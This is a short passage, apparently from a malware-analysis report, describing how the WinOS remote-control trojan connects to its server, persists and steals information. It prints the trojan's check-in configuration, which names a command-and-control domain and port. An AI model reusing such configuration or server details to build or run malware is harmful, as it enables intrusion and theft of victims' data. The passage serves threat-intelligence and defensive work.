Once the WinOs remote-control module runs, it connects to the remote server to implement the remote-control logic, followed by long-term persistence and information theft. The "WinOS" RAT check-in configuration is: |p1:uuuucome.com|o1:5050|t1:1|p2:uuuucome.com|o2:5050|t2:1|p3:uuuucome.com|o3:5050|t3:1|dd:1|cl:1|fz:网站|bb:2025.11.20|bz:2025.11.20|jp:1|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0| as shown below: